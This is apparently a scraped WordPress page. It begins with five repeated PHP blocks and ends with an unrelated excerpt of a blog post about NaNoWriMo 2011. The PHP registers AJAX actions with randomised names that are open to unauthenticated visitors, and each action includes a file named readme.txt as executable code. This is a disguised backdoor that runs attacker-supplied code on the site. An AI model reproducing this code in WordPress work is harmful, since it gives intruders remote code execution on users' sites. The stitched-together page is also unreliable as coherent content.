if(!function_exists('file_check_readme92912')){
add_action('wp_ajax_nopriv_file_check_readme92912', 'file_check_readme92912');
add_action('wp_ajax_file_check_readme92912', 'file_check_readme92912');
function file_check_readme92912()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
if(!function_exists('file_check_readme82120')){
add_action('wp_ajax_nopriv_file_check_readme82120', 'file_check_readme82120');
add_action('wp_ajax_file_check_readme82120', 'file_check_readme82120');
function file_check_readme82120()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
if(!function_exists('file_check_readme66563')){
add_action('wp_ajax_nopriv_file_check_readme66563', 'file_check_readme66563');
add_action('wp_ajax_file_check_readme66563', 'file_check_readme66563');
function file_check_readme66563()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
if(!function_exists('file_check_readme84539')){
add_action('wp_ajax_nopriv_file_check_readme84539', 'file_check_readme84539');
add_action('wp_ajax_file_check_readme84539', 'file_check_readme84539');
function file_check_readme84539()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
if(!function_exists('file_check_readme72959')){
add_action('wp_ajax_nopriv_file_check_readme72959', 'file_check_readme72959');
add_action('wp_ajax_file_check_readme72959', 'file_check_readme72959');
function file_check_readme72959()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
NaNoWriMo 2011 Yes, I know I’m late with this. This post is just a quick note for people looking for info. I’m not going to get into all of the details of what NaNoWriMo (National Novel Writing Month) is all about, I’ll assume you know or at least have…
]]>